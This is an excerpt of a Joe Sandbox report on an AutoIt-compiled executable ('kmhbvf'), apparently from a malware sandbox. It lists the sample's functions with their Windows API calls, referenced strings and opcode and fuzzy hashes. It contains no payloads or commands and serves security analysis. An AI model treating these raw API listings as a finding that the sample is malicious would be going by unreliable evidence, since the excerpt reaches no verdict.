                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: Combobox
                                                                  • API String ID: 3850602802-2096851135
                                                                  • Opcode ID: 257a8224d32696fe176ca295c37573331d5cde968346c744a608fed1579ae2e1
                                                                  • Instruction ID: b7dcbdcf77c5e37826449d67dd4e3fa3afab3ccba9a5a68eb0cce846367f5087
                                                                  • Opcode Fuzzy Hash: 257a8224d32696fe176ca295c37573331d5cde968346c744a608fed1579ae2e1
                                                                  • Instruction Fuzzy Hash: 9B11D071700208AFEF119F54DC80EAB3B6AEB843A5F504529FE24DB290D6719C50A7A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED2111: CreateWindowExW.USER32 ref: 00ED214F
                                                                    • Part of subcall function 00ED2111: GetStockObject.GDI32(00000011), ref: 00ED2163
                                                                    • Part of subcall function 00ED2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED216D
                                                                  • GetWindowRect.USER32 ref: 00F57296
                                                                  • GetSysColor.USER32(00000012), ref: 00F572B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                  • String ID: static
                                                                  • API String ID: 1983116058-2160076837
                                                                  • Opcode ID: 7d8973ea29da5e621a3429ab9784bf92f81e9e86251f90a04d620494d837f753
                                                                  • Instruction ID: 287d1d35cedf00aed3b9b3a86cf6d770f270a60b6d558fc80e4ee221e8c4d06d
                                                                  • Opcode Fuzzy Hash: 7d8973ea29da5e621a3429ab9784bf92f81e9e86251f90a04d620494d837f753
                                                                  • Instruction Fuzzy Hash: 60215972A1420AAFDB04DFB8DC45EFA7BA8EB08315F104519FE55D3240DB75E851EB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00F56FC7
                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F56FD6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: LengthMessageSendTextWindow
                                                                  • String ID: edit
                                                                  • API String ID: 2978978980-2167791130
                                                                  • Opcode ID: d3a259c877788a580215974e4e59bac6c9000b8b935e061b3d9aca3263724347
                                                                  • Instruction ID: f97b37ac99ed782faa4536a4aacc8965282d726d1f4f683e46e5148325fef210
                                                                  • Opcode Fuzzy Hash: d3a259c877788a580215974e4e59bac6c9000b8b935e061b3d9aca3263724347
                                                                  • Instruction Fuzzy Hash: 83119D71900208ABEB104E64EC80EAB3BA9EB04379FA04714FE30D31E0DB75DC54BB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F331C9
                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00F331E8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 70ce45faa463c6e7bb5355bfb981ce0589b2513abab7a6a4dcdbe69467213a19
                                                                  • Instruction ID: 5a17c541160b94627944221147bd029bf7564a068003c7244f9f7bb38a3fb260
                                                                  • Opcode Fuzzy Hash: 70ce45faa463c6e7bb5355bfb981ce0589b2513abab7a6a4dcdbe69467213a19
                                                                  • Instruction Fuzzy Hash: 73112B32D10218ABDB20FB98DC45B9D77B8AB05730F140222ED15A72A0D774EF05FB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F428F8
                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F42921
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$OpenOption
                                                                  • String ID: <local>
                                                                  • API String ID: 942729171-4266983199
                                                                  • Opcode ID: 50a6c30877fa012e4f984b879533da933fd3e8183b83304ea12cecad5cdb4304
                                                                  • Instruction ID: 8183320e0efd269a38cda57f1ad6c08058af3ed7e63198949d12f5569378bd5b
                                                                  • Opcode Fuzzy Hash: 50a6c30877fa012e4f984b879533da933fd3e8183b83304ea12cecad5cdb4304
                                                                  • Instruction Fuzzy Hash: 9B11CE71901226BAEB648B518C88EBBBFACEF05361F50813BF91582000E7B06994F6F0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F486E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00F4849D,?,00000000,?,?), ref: 00F486F7
                                                                  • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00F484A0
                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 00F484DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidehtonsinet_addr
                                                                  • String ID: 255.255.255.255
                                                                  • API String ID: 2496851823-2422070025
                                                                  • Opcode ID: d463a933c021031fac85c4c82c0e8eb5e4aa0577f7ce6836f17eabf05f70d4b1
                                                                  • Instruction ID: 3b16c6c5f0d74033d8ea68c3b2a48b77b456357cde1b8d9565e6e047cc91c74b
                                                                  • Opcode Fuzzy Hash: d463a933c021031fac85c4c82c0e8eb5e4aa0577f7ce6836f17eabf05f70d4b1
                                                                  • Instruction Fuzzy Hash: 3311E53150021AABCB10EF64DC42FBEB764FF00360F204556FD21A72D1DB71A811E755
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD
                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00F29A2B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: fc85cd653b396f9b388709ce744c5b1df5fcb7065e8c653876d044208956f8ec
                                                                  • Instruction ID: f4dd95115e19778c7c53059b39fe9b2033182adb7eb12229584d3fadeee8bc7f
                                                                  • Opcode Fuzzy Hash: fc85cd653b396f9b388709ce744c5b1df5fcb7065e8c653876d044208956f8ec
                                                                  • Instruction Fuzzy Hash: CF012871A41229AB8B14EBA4CC52DFEB3A9EF52320F100619F871A72C1EE745848A760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock_memmove
                                                                  • String ID: EA06
                                                                  • API String ID: 1988441806-3962188686
                                                                  • Opcode ID: 299883ae2549c29633254964e42d2720d2462478e664680cc6feb1415e07a5f4
                                                                  • Instruction ID: 18fe9d1bdbd4aba89fadf70f4841d80b1dca8067a62dab79d2d65c51fbc4c28b
                                                                  • Opcode Fuzzy Hash: 299883ae2549c29633254964e42d2720d2462478e664680cc6feb1415e07a5f4
                                                                  • Instruction Fuzzy Hash: 4501B97290425C7EDB18CAA8C856EFE7BFC9B15311F00419AF652D2181E5B5E6089760
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD
                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00F29923
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: 644e6984d8235d5dbe1b5858ac8e2854a53b5511647ea0a947ee8c6e402ac895
                                                                  • Instruction ID: 914a8186c37db53feb598104daf163d441c35faf4a5e9bcceb7a98de206e6523
                                                                  • Opcode Fuzzy Hash: 644e6984d8235d5dbe1b5858ac8e2854a53b5511647ea0a947ee8c6e402ac895
                                                                  • Instruction Fuzzy Hash: A101F772E411196BCB14EBA0DD52EFFB3E8DF11310F240019B861B3281EA645E48A6B1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F2B79A: GetClassNameW.USER32 ref: 00F2B7BD
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00F299A6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_memmove
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 372448540-1403004172
                                                                  • Opcode ID: 7cd560181611534107d1f384f45b80f8fc6df36608ab8fe0f2c9b16f493764fd
                                                                  • Instruction ID: 8f84d7015a7de8b37aafd64611b27a5830f33b3acad41cec63175456d597844a
                                                                  • Opcode Fuzzy Hash: 7cd560181611534107d1f384f45b80f8fc6df36608ab8fe0f2c9b16f493764fd
                                                                  • Instruction Fuzzy Hash: C7012BB2E4511D67CB14EBA0DD12EFFB3EC9F11350F240019BC55B3281DA644E48A672
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp
                                                                  • String ID: #32770
                                                                  • API String ID: 2292705959-463685578
                                                                  • Opcode ID: 5bcf0c0727316c85e407a1637536f4a7b4cf278110fc3850c80ce73d3c1f499b
                                                                  • Instruction ID: 875ae0bec18adf0ec94dfe188cf330d4fd5942588e14b0eaeb68c7bd0c4dc3ca
                                                                  • Opcode Fuzzy Hash: 5bcf0c0727316c85e407a1637536f4a7b4cf278110fc3850c80ce73d3c1f499b
                                                                  • Instruction Fuzzy Hash: B3E0D17250022D17D720A759EC45FA7FBECDB55771F000057FD04D7051D960E94587D1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00F288A0
                                                                    • Part of subcall function 00EF3588: _doexit.LIBCMT ref: 00EF3592
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Message_doexit
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 1993061046-4017498283
                                                                  • Opcode ID: ede56515961b2385ced9e81435bcc9d2509ba5bc7e2a2123071358a046e572a3
                                                                  • Instruction ID: 6be25f83f0882ff90067b6e5f8a09ec8a8cc339b4736ac539eefbdbe6248a13b
                                                                  • Opcode Fuzzy Hash: ede56515961b2385ced9e81435bcc9d2509ba5bc7e2a2123071358a046e572a3
                                                                  • Instruction Fuzzy Hash: C1D05B7238535C32D25572A5BC0BFDA7A888B05B61F104426FB08755D38DD6C59152D6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F0B544: _memset.LIBCMT ref: 00F0B551
                                                                    • Part of subcall function 00EF0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00F0B520,?,?,?,00ED100A), ref: 00EF0B79
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00ED100A), ref: 00F0B524
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00ED100A), ref: 00F0B533
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F0B52E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 3158253471-631824599
                                                                  • Opcode ID: 16b2bb74f827bdc0cb601acaf06ad1704703aa56e647b08273ebf23762e87357
                                                                  • Instruction ID: 571fba6c2713ace364e078e21456fd979fbd3807af8ad418833c4c2f45add4bb
                                                                  • Opcode Fuzzy Hash: 16b2bb74f827bdc0cb601acaf06ad1704703aa56e647b08273ebf23762e87357
                                                                  • Instruction Fuzzy Hash: 1BE092702003158FD330AF35E9097137AE0AF04704F14895EE456C2381DBB4D504FB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00F10091
                                                                    • Part of subcall function 00F4C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00F1027A,?), ref: 00F4C6E7
                                                                    • Part of subcall function 00F4C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F4C6F9
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00F10289
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                  • String ID: WIN_XPe
                                                                  • API String ID: 582185067-3257408948
                                                                  • Opcode ID: fa7ea245fc9c2f523024f6862cad7ef7b36042980e3528877db2fea40b80cbd7
                                                                  • Instruction ID: 83ea539332b02a2005376b70acff8ef486ac3832ae15d33bbae384c1a91642a6
                                                                  • Opcode Fuzzy Hash: fa7ea245fc9c2f523024f6862cad7ef7b36042980e3528877db2fea40b80cbd7
                                                                  • Instruction Fuzzy Hash: 03F0A571805109DFCB55DBA4C9A8BEDBAB8AB08304F241496E14AA2190CFB54EC5EF21
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00F39EB5
                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00F39ECC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: 3430a2fb78fad610c73284136eb6167b8edb61ed74300859bdb2eb861748acf4
                                                                  • Instruction ID: 29ea2cdfc8b290ff095072caa834405f54cd5dd1f109eeac05af3ac2178ae366
                                                                  • Opcode Fuzzy Hash: 3430a2fb78fad610c73284136eb6167b8edb61ed74300859bdb2eb861748acf4
                                                                  • Instruction Fuzzy Hash: 94D05E7554030DABDB50AB90DC0EFDBBB2CDB04B00F1042A2BE68910A2DEB095989BD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F55FEB
                                                                  • PostMessageW.USER32(00000000), ref: 00F55FF2
                                                                    • Part of subcall function 00F357FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35877
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: 1ef4298333384e4d24530d6f47b427e785dc45d4da4b691258956c399593233a
                                                                  • Instruction ID: 11f0dc2eba6deb2d8aae7b780e8e744522bbdd1ccd230c400db589227228c115
                                                                  • Opcode Fuzzy Hash: 1ef4298333384e4d24530d6f47b427e785dc45d4da4b691258956c399593233a
                                                                  • Instruction Fuzzy Hash: C0D0C931385716AAE664B7709C4FFD77A14BB45B50F140825B266AA1D1CDE4A8009754
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%